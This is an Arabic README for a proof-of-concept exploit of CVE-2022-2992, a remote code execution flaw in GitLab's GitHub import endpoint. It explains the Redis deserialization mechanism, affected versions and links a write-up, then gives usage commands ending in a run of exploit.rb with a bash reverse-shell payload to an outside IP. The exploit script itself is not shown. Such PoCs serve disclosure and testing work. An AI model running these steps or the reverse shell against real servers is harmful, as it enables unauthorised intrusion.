
مجموعة من سكربتات إثبات المفهوم (PoC) لاستغلال الثغرات، كتبها فريق Redway Security لمجموعة متنوعة من ثغرات CVE.
الوصف: يسمح هذا للمستخدم المُصادَق عليه بتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر نقطة نهاية Import from GitHub API.
الإصدارات المتأثرة: جميع الإصدارات من 11.10 إلى ما قبل 15.1.6، و15.2 إلى 15.2.4، و15.3 إلى 15.3.2
الإصدار المُصحَّح: 15.3.2
الباحث: vakzz
رابط الشرح: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
رابط NIST CVE: https://nvd.nist.gov/vuln/detail/CVE-2022-2992
يمكن للمستخدم المُصادَق عليه استيراد مستودع من Github إلى Gitlab. ويمكن للمهاجم محاولة الاستيراد من خادم تحكم خاص به، يردّ بكائن من بروتوكول تسلسل Redis داخل الحقل المتداخل default_branch، مما يجعل Gitlab يخزّن هذا الكائن مؤقتًا في Redis، ثم يقوم Redis بإلغاء تسلسله وتنفيذ الحمولة.
ستحتاج إلى رمز وصول شخصي
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567 # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload
